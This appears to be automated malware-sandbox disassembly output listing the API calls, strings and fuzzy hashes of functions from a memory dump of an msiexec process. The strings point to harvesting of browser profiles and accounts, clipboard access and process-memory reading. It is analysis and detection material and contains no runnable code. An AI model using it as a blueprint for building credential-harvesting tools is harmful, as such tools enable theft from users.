                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                    Similarity
                                                                    • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                    • String ID:
                                                                    • API String ID: 2628231878-0
                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                    APIs
                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                    Similarity
                                                                    • API ID: NtdllProc_Window
                                                                    • String ID:
                                                                    • API String ID: 4255912815-0
                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • memset.MSVCRT ref: 0040265F
                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                    • API String ID: 577499730-1134094380
                                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                    Similarity
                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                    • API String ID: 2787044678-1921111777
                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                    • GetDC.USER32 ref: 004140E3
                                                                    • wcslen.MSVCRT ref: 00414123
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                    Similarity
                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                    • String ID: %s:$EDIT$STATIC
                                                                    • API String ID: 2080319088-3046471546
                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                    APIs
                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                    • memset.MSVCRT ref: 00413292
                                                                    • memset.MSVCRT ref: 004132B4
                                                                    • memset.MSVCRT ref: 004132CD
                                                                    • memset.MSVCRT ref: 004132E1
                                                                    • memset.MSVCRT ref: 004132FB
                                                                    • memset.MSVCRT ref: 00413310
                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                    • memset.MSVCRT ref: 004133C0
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                    Strings
                                                                    • {Unknown}, xrefs: 004132A6
                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                    Similarity
                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                    • API String ID: 4111938811-1819279800
                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                    Similarity
                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                    • String ID:
                                                                    • API String ID: 829165378-0
                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                    • memset.MSVCRT ref: 00404200
                                                                    • memset.MSVCRT ref: 00404215
                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 0040426E
                                                                    • memset.MSVCRT ref: 004042CD
                                                                    • memset.MSVCRT ref: 004042E2
                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                    • API String ID: 2454223109-1580313836
                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                    APIs
                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                    • API String ID: 4054529287-3175352466
                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                    • API String ID: 3143752011-1996832678
                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                    • API String ID: 667068680-2887671607
                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                    • API String ID: 1607361635-601624466
                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    • API String ID: 2000436516-3842416460
                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                    APIs
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                    Similarity
                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1043902810-0
                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                    • API String ID: 2899246560-1542517562
                                                                    • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                    • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                    • API String ID: 3330709923-517860148
                                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040806A
                                                                    • memset.MSVCRT ref: 0040807F
                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                    • memset.MSVCRT ref: 004081E4
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
